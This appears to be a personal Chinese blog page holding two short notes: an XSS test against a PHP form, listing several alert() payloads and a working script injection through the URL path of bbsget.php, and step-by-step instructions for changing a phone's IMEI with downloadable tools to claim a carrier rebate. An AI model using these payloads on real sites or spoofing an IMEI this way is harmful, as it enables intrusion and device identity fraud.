xss一例

当前form页面，传到后台的参数已经如下处理：

".htmlentities($_POST["name"]);

于是试了

 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

　{{{ Form:: .. }}}　 .' onevent ='prompt(/XSS/);

 .'(( img src=x onerror='javascript:alert(1)

都不行啊，后来发现居然可以利用本地的form绕过，在url中

http://ip/bbsget.php/%22method=%22post%22%20%22%3E%3Cscript%3Ealert(10)%3C/script%3E//

看来需要测下原来接口一些遗漏的地方了

修改手机的串号IMEI

移动搞活动，买手机一定时间后返还话费，结果到现在才说必须手机号与指定手机放在一起使用，才能返还

这些运营商经常搞这种流氓行为的

于是，研究现在用的这部手机，如何修改IMEI号与那部移动手机一样。方法如下，试验一次性成功：

１、下载"移动叔叔工具"，备份本机ＩＭＥＩ号

２、到网上找　　IMEI号生成工具，或者名称为　IMEI串号生成修改器

３、使用上述工具生成指定串号IMEI，然后用　移动叔叔工具恢复IMEI号，一次性成功